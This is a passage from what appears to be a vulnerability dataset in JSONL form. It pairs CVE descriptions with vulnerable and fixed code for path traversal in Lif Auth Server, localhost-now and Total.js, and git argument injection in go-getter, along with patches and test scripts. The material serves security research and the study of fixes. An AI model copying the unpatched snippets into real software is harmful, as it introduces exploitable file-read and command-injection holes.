db.findKeys(\"pad:\"+padId+\"*\", null, function(err,records){\n+ db.findKeys(\"pad:\"+padId+\":*\", null, function(err,records){\n if(!err){\n+ for (var key in padcontent) { records.push(padcontent[key]);}\n cb(err, records);\n }\n })\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49801", "cve_description": "Lif Auth Server is a server for validating logins, managing information, and account recovery for Lif Accounts. The issue relates to the `get_pfp` and `get_banner` routes on Auth Server. The issue is that there is no check to ensure that the file that Auth Server is receiving through these URLs is correct. This could allow an attacker access to files they shouldn't have access to. 
This issue has been patched in version 1.4.0.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/Lif-Platforms/Lif-Auth-Server", "patch_url": ["https://github.com/Lif-Platforms/Lif-Auth-Server/commit/c235bcc2ee65e4a0dfb10284cf2cbc750213efeb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_382_1", "commit": "ffb704bf417213afc59cab9d74e5da0a5ead2a93", "file_path": "src/auth_server.py", "start_line": 335, "end_line": 351, "snippet": "async def get_pfp(username: str):\n \"\"\"\n ## Get User Avatar (Profile Picture)\n Allows services to get the avatar (profile picture) of a specified account. \n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n # Checks if the user has a profile pic uploaded\n if os.path.isfile(f\"user_images/pfp/{username}\"):\n return FileResponse(f\"user_images/pfp/{username}\", media_type='image/gif')\n else:\n # Returns default image if none is uploaded\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')"}, {"id": "vul_py_382_2", "commit": "ffb704bf417213afc59cab9d74e5da0a5ead2a93", "file_path": "src/auth_server.py", "start_line": 354, "end_line": 370, "snippet": "async def get_banner(username: str):\n \"\"\"\n ## Get User Banner\n Allows services to get the account banner of a specified account.\n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n # Checks if the user has a profile pic uploaded\n if os.path.isfile(f\"user_images/banner/{username}\"):\n return FileResponse(f\"user_images/banner/{username}\", media_type='image/gif')\n else:\n # Returns default image if none is uploaded\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')"}], "fix_func": [{"id": "fix_py_382_1", "commit": "c235bcc2ee65e4a0dfb10284cf2cbc750213efeb", "file_path": "src/auth_server.py", "start_line": 335, "end_line": 359, "snippet": "async def get_pfp(username: str):\n \"\"\"\n ## Get User Avatar (Profile Picture)\n Allows services to get the avatar (profile picture) of a specified account. 
\n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n if not username.isalnum():\n # Handle invalid input (username contains non-alphanumeric characters)\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n\n # Construct the file path using the sanitized username\n banner_path = f\"user_images/pfp/{username}\"\n\n # Check if the file exists and is a regular file\n if os.path.isfile(banner_path):\n return FileResponse(banner_path, media_type='image/gif')\n else:\n # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')"}, {"id": "fix_py_382_2", "commit": "c235bcc2ee65e4a0dfb10284cf2cbc750213efeb", "file_path": "src/auth_server.py", "start_line": 362, "end_line": 386, "snippet": "async def get_banner(username: str):\n \"\"\"\n ## Get User Banner\n Allows services to get the account banner of a specified account.\n \n ### Parameters:\n - **username (str):** The username for the account.\n\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n if not username.isalnum():\n # Handle invalid input (username contains non-alphanumeric characters)\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n\n # Construct the file path using the sanitized username\n banner_path = f\"user_images/banner/{username}\"\n\n # Check if the file exists and is a regular file\n if os.path.isfile(banner_path):\n return FileResponse(banner_path, media_type='image/gif')\n else:\n # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')"}], "vul_patch": "--- a/src/auth_server.py\n+++ b/src/auth_server.py\n@@ -9,9 +9,17 @@\n ### Returns:\n - **file:** The avatar the service requested.\n \"\"\"\n- # Checks if the user has a profile pic uploaded\n- if os.path.isfile(f\"user_images/pfp/{username}\"):\n- return FileResponse(f\"user_images/pfp/{username}\", media_type='image/gif')\n+ # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n+ if not username.isalnum():\n+ # Handle invalid input (username contains non-alphanumeric characters)\n+ return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n+\n+ # Construct the file path using the sanitized username\n+ banner_path = f\"user_images/pfp/{username}\"\n+\n+ # Check if the file exists and is a regular file\n+ if os.path.isfile(banner_path):\n+ return FileResponse(banner_path, media_type='image/gif')\n else:\n- # Returns default image if none is uploaded\n+ # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_pfp.png', media_type='image/gif')\n\n--- a/src/auth_server.py\n+++ b/src/auth_server.py\n@@ -9,9 +9,17 @@\n ### Returns:\n - **file:** The banner the service requested.\n \"\"\"\n- # Checks if the user has a profile pic uploaded\n- if os.path.isfile(f\"user_images/banner/{username}\"):\n- return FileResponse(f\"user_images/banner/{username}\", media_type='image/gif')\n+ # Sanitize and validate the username variable (Example: alphanumeric characters allowed)\n+ if not username.isalnum():\n+ # Handle invalid input (username contains 
non-alphanumeric characters)\n+ return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n+\n+ # Construct the file path using the sanitized username\n+ banner_path = f\"user_images/banner/{username}\"\n+\n+ # Check if the file exists and is a regular file\n+ if os.path.isfile(banner_path):\n+ return FileResponse(banner_path, media_type='image/gif')\n else:\n- # Returns default image if none is uploaded\n+ # Return default image if the user's banner doesn't exist\n return FileResponse(f'{assets_folder}/default_banner.png', media_type='image/gif')\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3729", "cve_description": "localhost-now node module suffers from a Path Traversal vulnerability due to lack of validation of file, which allows a malicious user to read content of any file with known path.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/DCKT/localhost-now", "patch_url": ["https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_182_1", "commit": "f12b069", "file_path": "lib/app.js", "start_line": 6, "end_line": 43, "snippet": "exports.start = function(args) {\n\tvar port = parseInt(args[0]) ? args[0] : 1337;\n\n\thttp.createServer(function(req, res) {\n\t\tvar url = req.url;\n\n\t\tif (url.indexOf('?') != -1) {\n\t\t\turl = url.split('?')[0];\n\t\t}\n\n\t\tvar file = url === \"/\" ? \"/index.html\" : url;\n\n\t\tfs.readFile(path.normalize(process.cwd()) + file, function(err, data) {\n\t\t\tif (!!err) {\n\t\t\t\tconsole.error('Error loading : '+ url);\n\t\t\t\tres.writeHead(404);\n\t\t\t\tres.end();\n\t\t\t}\n\t\t\telse {\n\t\t\t\tvar type = path.extname(file);\n\n\t\t\t\tif (type === \".js\") {\n\t contentType = 'application/javascript';\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tcontentType = \"text/\"+ type.slice(1, type.length);\n\t\t\t\t}\n\n\t\t\t\tres.setHeader('content-type', contentType);\n\t\t\t\tres.end(data);\n\t\t\t}\n\n\n\t\t});\n\n\t}).listen(port);\n\tprocess.stdout.write(\"\\033[33mWeb Server started on localhost:\"+ port +\" \\033[39m\\n\");\n}"}], "fix_func": [{"id": "fix_js_182_1", "commit": "30b004c", "file_path": "lib/app.js", "start_line": 6, "end_line": 41, "snippet": "exports.start = function(args) {\n const port = parseInt(args[0]) ? args[0] : 1337\n\n http\n .createServer(function(req, res) {\n const url = req.url\n\n if (url.indexOf('?') != -1) {\n url = url.split('?')[0]\n }\n\n const file = url === '/' ? 
'/index.html' : url.replace(/(\\.\\.[\\/\\\\])+/g, '')\n const rootPath = path.normalize(process.cwd())\n\n fs.readFile(`${rootPath}${file}`, (err, data) => {\n if (!!err) {\n console.error('Error loading : ' + url)\n res.writeHead(404)\n res.end()\n } else {\n var type = path.extname(file)\n\n if (type === '.js') {\n contentType = 'application/javascript'\n } else {\n contentType = 'text/' + type.slice(1, type.length)\n }\n\n res.setHeader('content-type', contentType)\n res.end(data)\n }\n })\n })\n .listen(port)\n process.stdout.write('\\033[33mWeb Server started on localhost:' + port + ' \\033[39m\\n')\n}"}], "vul_patch": "--- a/lib/app.js\n+++ b/lib/app.js\n@@ -1,38 +1,36 @@\n exports.start = function(args) {\n-\tvar port = parseInt(args[0]) ? args[0] : 1337;\n+ const port = parseInt(args[0]) ? args[0] : 1337\n \n-\thttp.createServer(function(req, res) {\n-\t\tvar url = req.url;\n+ http\n+ .createServer(function(req, res) {\n+ const url = req.url\n \n-\t\tif (url.indexOf('?') != -1) {\n-\t\t\turl = url.split('?')[0];\n-\t\t}\n+ if (url.indexOf('?') != -1) {\n+ url = url.split('?')[0]\n+ }\n \n-\t\tvar file = url === \"/\" ? \"/index.html\" : url;\n+ const file = url === '/' ? '/index.html' : url.replace(/(\\.\\.[\\/\\\\])+/g, '')\n+ const rootPath = path.normalize(process.cwd())\n \n-\t\tfs.readFile(path.normalize(process.cwd()) + file, function(err, data) {\n-\t\t\tif (!!err) {\n-\t\t\t\tconsole.error('Error loading : '+ url);\n-\t\t\t\tres.writeHead(404);\n-\t\t\t\tres.end();\n-\t\t\t}\n-\t\t\telse {\n-\t\t\t\tvar type = path.extname(file);\n+ fs.readFile(`${rootPath}${file}`, (err, data) => {\n+ if (!!err) {\n+ console.error('Error loading : ' + url)\n+ res.writeHead(404)\n+ res.end()\n+ } else {\n+ var type = path.extname(file)\n \n-\t\t\t\tif (type === \".js\") {\n-\t contentType = 'application/javascript';\n-\t\t\t\t}\n-\t\t\t\telse {\n-\t\t\t\t\tcontentType = \"text/\"+ type.slice(1, type.length);\n-\t\t\t\t}\n+ if (type === '.js') {\n+ contentType = 'application/javascript'\n+ } else {\n+ contentType = 'text/' + type.slice(1, type.length)\n+ }\n \n-\t\t\t\tres.setHeader('content-type', contentType);\n-\t\t\t\tres.end(data);\n-\t\t\t}\n-\n-\n-\t\t});\n-\n-\t}).listen(port);\n-\tprocess.stdout.write(\"\\033[33mWeb Server started on localhost:\"+ port +\" \\033[39m\\n\");\n+ res.setHeader('content-type', contentType)\n+ res.end(data)\n+ }\n+ })\n+ })\n+ .listen(port)\n+ process.stdout.write('\\033[33mWeb Server started on localhost:' + port + ' \\033[39m\\n')\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-6257", "cve_description": "HashiCorp\u2019s go-getter library can be coerced into executing Git update on an existing maliciously modified Git Configuration, potentially leading to arbitrary code execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, 
"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/hashicorp/go-getter", "patch_url": ["https://github.com/hashicorp/go-getter/commit/268c11cae8cf0d9374783e06572679796abe9ce9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_20_1", "commit": "975961f", "file_path": "get_git.go", "start_line": 192, "end_line": 229, "snippet": "func (g *GitGetter) clone(ctx context.Context, dst, sshKeyFile string, u *url.URL, ref string, depth int) error {\n\targs := []string{\"clone\"}\n\n\toriginalRef := ref // we handle an unspecified ref differently than explicitly selecting the default branch below\n\tif ref == \"\" {\n\t\tref = findRemoteDefaultBranch(ctx, u)\n\t}\n\tif depth > 0 {\n\t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n\t\targs = append(args, \"--branch\", ref)\n\t}\n\targs = append(args, u.String(), dst)\n\n\tcmd := exec.CommandContext(ctx, \"git\", args...)\n\tsetupGitEnv(cmd, sshKeyFile)\n\terr := getRunCommand(cmd)\n\tif err != nil {\n\t\tif depth > 0 && originalRef != \"\" {\n\t\t\t// If we're creating a shallow clone then the given ref must be\n\t\t\t// a named ref (branch or tag) rather than a commit directly.\n\t\t\t// We can't accurately recognize the resulting error here without\n\t\t\t// hard-coding assumptions about git's human-readable output, but\n\t\t\t// we can at least try a heuristic.\n\t\t\tif gitCommitIDRegex.MatchString(originalRef) {\n\t\t\t\treturn fmt.Errorf(\"%w (note that setting 'depth' requires 'ref' to be a branch or tag name)\", err)\n\t\t\t}\n\t\t}\n\t\treturn err\n\t}\n\n\tif depth < 1 && originalRef != \"\" {\n\t\t// If we didn't add --depth and --branch above then we will now be\n\t\t// on the remote repository's default branch, rather than the selected\n\t\t// ref, so we'll need to fix that before we return.\n\t\treturn g.checkout(ctx, dst, originalRef)\n\t}\n\treturn nil\n}"}, {"id": "vul_go_20_2", "commit": "975961f", "file_path": "get_git.go", "start_line": 290, "end_line": 300, "snippet": "func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n\tvar stdoutbuf bytes.Buffer\n\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", u.String(), \"HEAD\")\n\tcmd.Stdout = &stdoutbuf\n\terr := cmd.Run()\n\tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\tif err != nil || matches == nil {\n\t\treturn \"master\"\n\t}\n\treturn matches[len(matches)-1]\n}"}], "fix_func": [{"id": "fix_go_20_1", "commit": "268c11c", "file_path": "get_git.go", "start_line": 192, "end_line": 229, "snippet": "func (g *GitGetter) clone(ctx context.Context, dst, sshKeyFile string, u *url.URL, ref string, depth int) error {\n\targs := []string{\"clone\"}\n\n\toriginalRef := ref // we handle an unspecified ref differently than explicitly selecting the default branch below\n\tif ref == \"\" {\n\t\tref = findRemoteDefaultBranch(ctx, u)\n\t}\n\tif depth > 0 {\n\t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n\t\targs = append(args, \"--branch\", ref)\n\t}\n\targs = append(args, \"--\", u.String(), dst)\n\n\tcmd := exec.CommandContext(ctx, \"git\", args...)\n\tsetupGitEnv(cmd, sshKeyFile)\n\terr := getRunCommand(cmd)\n\tif err != nil 
{\n\t\tif depth > 0 && originalRef != \"\" {\n\t\t\t// If we're creating a shallow clone then the given ref must be\n\t\t\t// a named ref (branch or tag) rather than a commit directly.\n\t\t\t// We can't accurately recognize the resulting error here without\n\t\t\t// hard-coding assumptions about git's human-readable output, but\n\t\t\t// we can at least try a heuristic.\n\t\t\tif gitCommitIDRegex.MatchString(originalRef) {\n\t\t\t\treturn fmt.Errorf(\"%w (note that setting 'depth' requires 'ref' to be a branch or tag name)\", err)\n\t\t\t}\n\t\t}\n\t\treturn err\n\t}\n\n\tif depth < 1 && originalRef != \"\" {\n\t\t// If we didn't add --depth and --branch above then we will now be\n\t\t// on the remote repository's default branch, rather than the selected\n\t\t// ref, so we'll need to fix that before we return.\n\t\treturn g.checkout(ctx, dst, originalRef)\n\t}\n\treturn nil\n}"}, {"id": "fix_go_20_2", "commit": "268c11c", "file_path": "get_git.go", "start_line": 290, "end_line": 300, "snippet": "func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n\tvar stdoutbuf bytes.Buffer\n\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", \"--\", u.String(), \"HEAD\")\n\tcmd.Stdout = &stdoutbuf\n\terr := cmd.Run()\n\tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\tif err != nil || matches == nil {\n\t\treturn \"master\"\n\t}\n\treturn matches[len(matches)-1]\n}"}], "vul_patch": "--- a/get_git.go\n+++ b/get_git.go\n@@ -9,7 +9,7 @@\n \t\targs = append(args, \"--depth\", strconv.Itoa(depth))\n \t\targs = append(args, \"--branch\", ref)\n \t}\n-\targs = append(args, u.String(), dst)\n+\targs = append(args, \"--\", u.String(), dst)\n \n \tcmd := exec.CommandContext(ctx, \"git\", args...)\n \tsetupGitEnv(cmd, sshKeyFile)\n\n--- a/get_git.go\n+++ b/get_git.go\n@@ -1,6 +1,6 @@\n func findRemoteDefaultBranch(ctx context.Context, u *url.URL) string {\n \tvar stdoutbuf bytes.Buffer\n-\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", u.String(), \"HEAD\")\n+\tcmd := exec.CommandContext(ctx, \"git\", \"ls-remote\", \"--symref\", \"--\", u.String(), \"HEAD\")\n \tcmd.Stdout = &stdoutbuf\n \terr := cmd.Run()\n \tmatches := lsRemoteSymRefRegexp.FindStringSubmatch(stdoutbuf.String())\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-6257:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/go-getter\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGitGetter_BadRemoteUrl$ github.com/hashicorp/go-getter\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-6257:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/go-getter\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestGitGetter_gitVersion|TestGitGetter_tag|TestGitGetter_sshSCPStyleInvalidScheme|TestGitGetter_shallowClone|TestGitGetter_setupGitEnvWithNoKeyFile|TestGitGetter_commitID|TestGitGetter_branch|TestGitGetter_shallowCloneWithTag|TestGitGetter_GetFile|TestGitGetter_submodule|TestGitGetter_subdirectory|TestGitGetter_shallowCloneWithCommitID|TestGitGetter_setupGitEnv_sshKey|TestGitGetter_impl|TestGitGetter|TestGitGetter_branchUpdate|TestGitGetter_subdirectory_symlink|TestGitGetter_remoteWithoutMaster|TestGitGetter_setupGitEnvWithExisting_sshKey)$' github.com/hashicorp/go-getter"} {"cve_id": "CVE-2019-8903", "cve_description": "index.js in Total.js Platform before 3.2.3 allows path traversal.", "cwe_info": 
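Annotation on the go-getter record above (CWE-78): the fix is a one-token change, inserting `--` before the user-controlled URL so git stops option parsing and a crafted source such as `--upload-pack=<command>` can no longer be honored as a flag. A minimal sketch of the same pattern, written in Python for illustration (go-getter itself is Go; the helper name is mine):

```python
import subprocess

def clone(url: str, dst: str) -> None:
    # Without "--", a URL beginning with "-" is parsed as a git option, so a
    # source like "--upload-pack=<command>" runs attacker-chosen code. The
    # "--" terminator forces git to treat everything after it as operands.
    subprocess.run(["git", "clone", "--", url, dst], check=True)
```

With the terminator in place, a malicious URL degrades to a "repository does not exist" error (a `CalledProcessError` here) instead of command execution.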
{"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/totaljs/framework", "patch_url": ["https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b", "https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_170_1", "commit": "f1e94c1", "file_path": "index.js", "start_line": 7380, "end_line": 7564, "snippet": "F.$requestcontinue = function(req, res, headers) {\n\n\tif (!req || !res || res.headersSent || res.success)\n\t\treturn;\n\n\t// Validates if this request is the file (static file)\n\tif (req.isStaticFile) {\n\n\t\t// Stops path travelsation outside of \"public\" directory\n\t\t// A potential security issue\n\t\tif (req.uri.pathname.indexOf('./') !== -1) {\n\t\t\treq.$total_status(404);\n\t\t\treturn;\n\t\t}\n\n\t\tF.stats.request.file++;\n\t\tif (F._length_files)\n\t\t\treq.$total_file();\n\t\telse\n\t\t\tres.continue();\n\t\treturn;\n\t}\n\n\tif (!PERF[req.method]) {\n\t\treq.$total_status(404);\n\t\treturn;\n\t}\n\n\tF.stats.request.web++;\n\n\treq.body = EMPTYOBJECT;\n\treq.files = EMPTYARRAY;\n\treq.buffer_exceeded = false;\n\treq.buffer_has = false;\n\treq.$flags = req.method[0] + req.method[1];\n\n\tvar flags = [req.method.toLowerCase()];\n\tvar multipart;\n\n\tif (F._request_check_mobile && req.mobile) {\n\t\treq.$flags += 'a';\n\t\tF.stats.request.mobile++;\n\t} else\n\t\tF.stats.request.desktop++;\n\n\treq.$protocol[5] && (req.$flags += req.$protocol[5]);\n\treq.$type = 0;\n\tflags.push(req.$protocol);\n\n\tvar method = req.method;\n\tvar first = method[0];\n\n\tif (first === 'P' || first === 'D') {\n\t\tmultipart = req.headers['content-type'] || '';\n\t\treq.buffer_data = U.createBuffer();\n\t\tvar index = multipart.lastIndexOf(';');\n\t\tvar tmp = multipart;\n\t\tif (index !== -1)\n\t\t\ttmp = tmp.substring(0, index);\n\t\tswitch (tmp.substring(tmp.length - 4)) {\n\t\t\tcase 'json':\n\t\t\t\treq.$flags += 'b';\n\t\t\t\tflags.push('json');\n\t\t\t\treq.$type = 1;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'oded':\n\t\t\t\treq.$type = 3;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'data':\n\t\t\t\treq.$flags += 'c';\n\t\t\t\treq.$upload = true;\n\t\t\t\tflags.push('upload');\n\t\t\t\tbreak;\n\t\t\tcase '/xml':\n\t\t\t\treq.$flags += 'd';\n\t\t\t\tflags.push('xml');\n\t\t\t\treq.$type = 2;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tif (multipart) {\n\t\t\t\t\t// 'undefined' DATA\n\t\t\t\t\tmultipart = '';\n\t\t\t\t\tflags.push('raw');\n\t\t\t\t} else {\n\t\t\t\t\treq.$type = 3;\n\t\t\t\t\tmultipart = '';\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (headers.accept === 'text/event-stream') {\n\t\treq.$flags += 'g';\n\t\tflags.push('sse');\n\t}\n\n\tif (DEBUG) {\n\t\treq.$flags += 'h';\n\t\tflags.push('debug');\n\t}\n\n\tif (req.xhr) {\n\t\tF.stats.request.xhr++;\n\t\treq.$flags += 
'i';\n\t\tflags.push('xhr');\n\t}\n\n\tif (F._request_check_robot && req.robot)\n\t\treq.$flags += 'j';\n\n\tif (F._request_check_referer) {\n\t\tvar referer = headers['referer'];\n\t\tif (referer && referer.indexOf(headers['host']) !== -1) {\n\t\t\treq.$flags += 'k';\n\t\t\tflags.push('referer');\n\t\t}\n\t}\n\n\treq.flags = flags;\n\tF.$events['request-begin'] && EMIT('request-begin', req, res);\n\n\tvar isCORS = (F._length_cors || F.routes.corsall) && req.headers.origin != null;\n\n\tswitch (first) {\n\t\tcase 'G':\n\t\t\tF.stats.request.get++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'O':\n\t\t\tF.stats.request.options++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'H':\n\t\t\tF.stats.request.head++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'D':\n\t\t\tF.stats.request['delete']++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\telse\n\t\t\t\treq.$total_urlencoded();\n\t\t\treturn;\n\n\t\tcase 'P':\n\t\t\tif (F._request_check_POST) {\n\t\t\t\tif (multipart) {\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback_multipart, multipart);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_multipart(multipart);\n\t\t\t\t} else {\n\t\t\t\t\tif (method === 'PUT')\n\t\t\t\t\t\tF.stats.request.put++;\n\t\t\t\t\telse if (method === 'PATCH')\n\t\t\t\t\t\tF.stats.request.path++;\n\t\t\t\t\telse\n\t\t\t\t\t\tF.stats.request.post++;\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_urlencoded();\n\t\t\t\t}\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tbreak;\n\t}\n\n\treq.$total_status(404);\n};"}], "fix_func": [{"id": "fix_js_170_1", "commit": "de16238", "file_path": "index.js", "start_line": 7380, "end_line": 7568, "snippet": "F.$requestcontinue = function(req, res, headers) {\n\n\tif (!req || !res || res.headersSent || res.success)\n\t\treturn;\n\n\t// Validates if this request is the file (static file)\n\tif (req.isStaticFile) {\n\n\t\t// Stops path travelsation outside of \"public\" directory\n\t\t// A potential security issue\n\t\tfor (var i = 0; i < req.uri.pathname.length; i++) {\n\t\t\tvar c = req.uri.pathname[i];\n\t\t\tvar n = req.uri.pathname[i + 1];\n\t\t\tif ((c === '.' 
&& n === '/') || (c === '%' && n === '2' && req.uri.pathname[i + 2] === 'e')) {\n\t\t\t\treq.$total_status(404);\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tF.stats.request.file++;\n\t\tif (F._length_files)\n\t\t\treq.$total_file();\n\t\telse\n\t\t\tres.continue();\n\t\treturn;\n\t}\n\n\tif (!PERF[req.method]) {\n\t\treq.$total_status(404);\n\t\treturn;\n\t}\n\n\tF.stats.request.web++;\n\n\treq.body = EMPTYOBJECT;\n\treq.files = EMPTYARRAY;\n\treq.buffer_exceeded = false;\n\treq.buffer_has = false;\n\treq.$flags = req.method[0] + req.method[1];\n\n\tvar flags = [req.method.toLowerCase()];\n\tvar multipart;\n\n\tif (F._request_check_mobile && req.mobile) {\n\t\treq.$flags += 'a';\n\t\tF.stats.request.mobile++;\n\t} else\n\t\tF.stats.request.desktop++;\n\n\treq.$protocol[5] && (req.$flags += req.$protocol[5]);\n\treq.$type = 0;\n\tflags.push(req.$protocol);\n\n\tvar method = req.method;\n\tvar first = method[0];\n\n\tif (first === 'P' || first === 'D') {\n\t\tmultipart = req.headers['content-type'] || '';\n\t\treq.buffer_data = U.createBuffer();\n\t\tvar index = multipart.lastIndexOf(';');\n\t\tvar tmp = multipart;\n\t\tif (index !== -1)\n\t\t\ttmp = tmp.substring(0, index);\n\t\tswitch (tmp.substring(tmp.length - 4)) {\n\t\t\tcase 'json':\n\t\t\t\treq.$flags += 'b';\n\t\t\t\tflags.push('json');\n\t\t\t\treq.$type = 1;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'oded':\n\t\t\t\treq.$type = 3;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'data':\n\t\t\t\treq.$flags += 'c';\n\t\t\t\treq.$upload = true;\n\t\t\t\tflags.push('upload');\n\t\t\t\tbreak;\n\t\t\tcase '/xml':\n\t\t\t\treq.$flags += 'd';\n\t\t\t\tflags.push('xml');\n\t\t\t\treq.$type = 2;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tif (multipart) {\n\t\t\t\t\t// 'undefined' DATA\n\t\t\t\t\tmultipart = '';\n\t\t\t\t\tflags.push('raw');\n\t\t\t\t} else {\n\t\t\t\t\treq.$type = 3;\n\t\t\t\t\tmultipart = '';\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (headers.accept === 'text/event-stream') {\n\t\treq.$flags += 'g';\n\t\tflags.push('sse');\n\t}\n\n\tif (DEBUG) {\n\t\treq.$flags += 'h';\n\t\tflags.push('debug');\n\t}\n\n\tif (req.xhr) {\n\t\tF.stats.request.xhr++;\n\t\treq.$flags += 'i';\n\t\tflags.push('xhr');\n\t}\n\n\tif (F._request_check_robot && req.robot)\n\t\treq.$flags += 'j';\n\n\tif (F._request_check_referer) {\n\t\tvar referer = headers['referer'];\n\t\tif (referer && referer.indexOf(headers['host']) !== -1) {\n\t\t\treq.$flags += 'k';\n\t\t\tflags.push('referer');\n\t\t}\n\t}\n\n\treq.flags = flags;\n\tF.$events['request-begin'] && EMIT('request-begin', req, res);\n\n\tvar isCORS = (F._length_cors || F.routes.corsall) && req.headers.origin != null;\n\n\tswitch (first) {\n\t\tcase 'G':\n\t\t\tF.stats.request.get++;\n\t\t\tif 